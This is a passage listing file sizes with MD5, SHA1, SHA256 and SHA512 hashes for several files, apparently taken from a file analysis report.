SHA256c54eb0859ede7e4031e0cf504f934764b2d6de3315729788072f111ebf561385
SHA5120b8d615ae097f615f6afa312178f56c4fdde5b5e46b49f11947542a1b7aad953f89b80fda99ce7d65aef1de737d89ba443869e6d9e9a202ec9a3e31316509371
-
Filesize
10KB
MD58ec23d49f8445605791e16d03fea719e
SHA1ee4c372137b347ba85b02bbb06ee01a4979b9357
SHA25621efbc263bef2867cf26850f3f34e2798c59911feb53a45c1d0addacec29a0ad
SHA512c7530138599e3dd389e72a3219d8a725e9eb86891c33146458d36201420ab54b7d6f0aaab2fb57443ef8d1efc9c216163e16a11ccf50a33b77908a206364752d
-
Filesize
1.1MB
MD59d0daba81cee203b0d39377baef9f4cb
SHA1ed37746cbb5ed85c54aa90c3598b7069c194bad9
SHA2561f12e8352afbb111918f2a3e7cdad8202ea4f55e691f1de55ac0bd58f2f96460
SHA512cb29f7c6a71efa33652298f35cc878427806e2452a65c70079bf5f9fded7fb90500d9e73c96c85a2fdfa85587b7a7c365c7464e0e7b90832da6bfec3926f51cb
-
Filesize
455KB
MD59adfcdac59db3286690c7eede8da2528
SHA10b54d251438a634bd13b49a1f20587cf03d4598d
SHA25613037eedd91f9313ec0d807947db65c639642e5ae6497e87d12fa6d19951f78e
SHA512fde1700cdb4212593ec2733944a169c7d02f436ca6831719a33482fbfd0be289697c9aa6ce7ddfb6c245e87952b35416929bbf69753d21a24197ac6c2d1243cc
-
Filesize
29KB
MD5f22740ba54a400fd2be7690bb204aa08
SHA15812387783d61c6ab5702213bb968590a18065e3
SHA25665c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9
SHA512ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500